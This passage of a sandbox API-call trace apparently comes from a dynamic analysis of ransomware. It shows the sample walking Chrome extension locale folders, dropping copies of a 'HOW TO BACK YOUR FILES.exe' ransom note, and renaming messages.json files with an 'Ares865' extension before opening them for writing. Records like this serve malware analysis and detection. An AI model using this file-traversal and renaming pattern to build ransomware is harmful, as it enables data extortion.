ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.436] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.436] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.436] lstrlenW (lpString="messages.json") returned 13 [0102.436] lstrlenW (lpString="Ares865") returned 7 [0102.436] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.Ares865") returned 163 [0102.437] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0102.441] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el" [0102.441] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el" [0102.441] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.441] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.442] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.442] GetLastError () returned 0x0 [0102.442] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841147f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea829e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea829e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.443] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.443] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.443] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.443] lstrlenW (lpString="messages.json") returned 13 [0102.443] lstrlenW (lpString="Ares865") returned 7 [0102.443] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.443] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.Ares865") returned 160 [0102.443] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=304) returned 1 [0102.448] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de" [0102.448] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de" [0102.448] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.448] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.449] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.449] GetLastError () returned 0x0 [0102.449] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84097fc0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea829e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea829e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.449] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.449] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.450] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.450] lstrlenW (lpString="messages.json") returned 13 [0102.450] lstrlenW (lpString="Ares865") returned 7 [0102.450] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.Ares865") returned 160 [0102.450] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=220) returned 1 [0102.455] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da" [0102.455] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da" [0102.455] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.455] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.456] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.456] GetLastError () returned 0x0 [0102.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.456] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8408bc70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaa8b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaa8b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.456] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.456] lstrlenW (lpString="messages.json") returned 13 [0102.456] lstrlenW (lpString="Ares865") returned 7 [0102.456] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.Ares865") returned 160 [0102.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=207) returned 1 [0102.461] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs" [0102.461] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs" [0102.461] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.461] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.462] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.462] GetLastError () returned 0x0 [0102.462] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8406e7b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaa8b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaa8b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.463] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.463] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.463] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.463] lstrlenW (lpString="messages.json") returned 13 [0102.463] lstrlenW (lpString="Ares865") returned 7 [0102.463] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.Ares865") returned 160 [0102.463] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=218) returned 1 [0102.468] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca" [0102.468] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca" [0102.468] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.468] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.468] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.469] GetLastError () returned 0x0 [0102.469] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.469] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 